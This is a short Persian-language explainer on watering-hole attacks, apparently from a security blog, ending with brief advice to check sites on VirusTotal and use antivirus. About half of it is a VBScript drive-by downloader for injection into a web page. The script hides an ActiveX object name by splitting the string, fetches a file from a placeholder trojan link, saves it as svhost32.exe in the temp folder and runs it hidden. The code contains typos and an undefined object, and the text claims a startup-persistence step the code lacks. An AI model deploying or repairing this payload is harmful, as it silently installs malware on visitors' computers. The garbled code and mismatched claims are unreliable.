watering hole چیست؟
در حمله Watering hole، هکر از از تارگت موردنظر اطلاعات جمع آوری می کند. برای مثال وب سایت هایی که قربانی از آنها زیاد بازدید می کند از جمله: (سایت پیش بینی وضع هوا، اخبار روز و..)
در قدم بعدی، پس از شناسایی آن صفحات پربازدید هکرها با ایجاد یک گودال آب به شناسایی آسیب پذیری های این صفحات برای تزریق کد مخرب به تبلیغات، آگهی ها و غیره می پردازند.
که در ادامه نمونه ای از این سورس کد ها را خواهیم دید.
<script language="VBScript">
on error resume next
dl = " لینک تروجان یا فایل مخرب مورد نظر اینجا وارد می شود "
set df = document.crateELement("object")
df.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
set x = df.createObject(str,"")
a1="Ado"
a2="db"
a3="str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl , False
x.Send
fname1="svhost32.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpaecialFolder(2)
fname1 = F.Buildpath(tmp,fname1)
S.open
d.write X.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("shell.application","")
Q.ShellExecute fname1,"","",open",0
</script>
تحلیل کد ذکرشده
این اسکریپت در قسمت بالای تگ <body> قرار می گیرد. در نتیجه، هنگامی که قربانی به صفحه مخرب موردنظر مراجعه می کند، یک اسکریپت به طور خودکار و مخفی اجرا می شود که در آن ممکن است یک فایل با هرپسوندی از (جمله exe) دانلود و به صورت مخفیانه اجرا شود و درنهایت در قسمت startup ویندوز قرار گیرد.
راه های مقابله با این نوع حملات
برای اطمینان بیشتر همیشه قبل از مراجعه به هرصفحه ای ،آن آدرس را در سایت Virustotal تست نمایید.
استفاده از آنتی ویروس معتبر همراه برای مثال (Kaspersky,F-secure) با لایسنس اوریجینال و بروز رسانی منظم آن یکی از راهکارهای موثر است
هنوز بررسیای ثبت نشده است.